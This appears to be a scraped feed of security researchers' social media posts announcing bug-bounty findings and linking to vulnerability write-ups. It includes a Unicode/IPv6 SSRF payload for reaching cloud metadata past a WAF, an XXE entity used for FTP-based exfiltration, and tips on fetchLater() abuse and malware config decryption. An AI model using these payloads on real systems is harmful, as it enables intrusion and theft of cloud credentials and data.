If the target sets X-Frame-Options: DENY, you can’t iframe it to abuse session context. But @slonser_ points out a slick workaround: use the fetchLater() API to schedule deferred requests that execute even after the page is closed or navigated away from.
The article is out! 🤟
Title: We hacked Google’s A.I Gemini and leaked its source code (at least some part)
We worked on this with @Rhynorater and I'm so excited this is finally out ;)
Link in the thread 🧵
My blog post about several findings in Dynamics 365 Business Central. I tried writing in a .NET primer style for code audit beginners.
frycos.github.io/vulns4free/202…
The first batch of #H165 winners are here! On behalf of the HackerOne and @salesforce teams, thank you for your hard work. 💪
1st Place: arneswinner
3rd Place: ngocdh
Eliminator: matanber
Exterminators: shubs, ziot, nahamsec, ryotak
Most Valuable Hacker: arneswinner
I can't believe so many people are sleeping on this research: code-white.com/blog/leaking-o…
Code White again smashes it out of the park with their meticulous knowledge of software stacks. I have so much respect for them publishing this.
Nice work, @mwulftange!
Check out our new blog post! We hacked into Apple Travel Portal (yes, again!) using a 0-day Remote Code Execution exploit. Part 1 is live now, stay tuned for the follow-up on another RCE worth a total bounty of $40k!
blog.projectdiscovery.io/hello-lucee-le…
Early this morning, we alerted our customers to a new Ivanti SSRF vulnerability that our research team discovered when reverse engineering Ivanti’s latest patch.
We decided to hold off on releasing this blog post publicly and support our customers in their remediation.
Since this finding has been publicly posted by another party, we are also releasing our research to help add some more color.
assetnote.io/resources/rese…
Exploiting ASP.NET TemplateParser to get RCE in Sitecore (CVE-2023-35813) and SharePoint (CVE-2023-33160) by @mwulftange in two parts: part 1 at code-white.com/blog/exploitin… is live now and part 2 will follow in a few days... stay tuned!
Successfully bypassed an SSRF WAF by using a combination of IPv6 + Unicode. Payload for Metadata instances:
http://[::ⓕⓕⓕⓕ:①⑥⑨。②⑤④。⑯⑨。②⑤④]:80
Check images for response difference between 169.254.169.254 and the above payload I shared 🔥
#bugbounty #infosec #waf
RE Tip. If you want to decrypt obfuscated .NET strings, just call them from PowerShell. E.g. this is xWorm config decryption.
File: virustotal.com/gui/file/cb0a5…
4/ 🔥 Did you know `<!ENTITY x SYSTEM "//domain/">` in Java triggers an FTP request, not HTTP? The WAF didn't. I leveraged this oversight for successful data exfiltration.